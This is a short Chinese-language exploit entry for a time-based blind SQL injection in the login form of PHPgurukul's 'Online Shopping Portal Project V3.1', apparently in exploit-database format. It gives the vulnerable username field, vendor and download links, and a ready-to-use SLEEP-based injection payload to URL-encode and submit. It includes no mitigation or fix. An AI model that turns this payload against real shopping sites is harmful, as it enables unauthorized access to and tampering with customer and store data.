Online Shopping Portal Project V3.1 允许远程攻击者通过登录表单执行任意 SQL 命令/查询,导致未授权访问和潜在的数据篡改。该漏洞源于对用户提供的用户名字段输入验证不足,从而引发 SQL 注入攻击。
漏洞利用标题: Online Shopping Portal Project V3.1 PHPgurukul - Time-Based Blind Sqli
漏洞利用作者: Akshad Joshi
厂商主页: https://phpgurukul.com
软件链接: https://phpgurukul.com/shopping-portal-free-download/
测试平台: Linux
使用此载荷 (进行 URL 编码):
[email protected]' AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH'='GMDH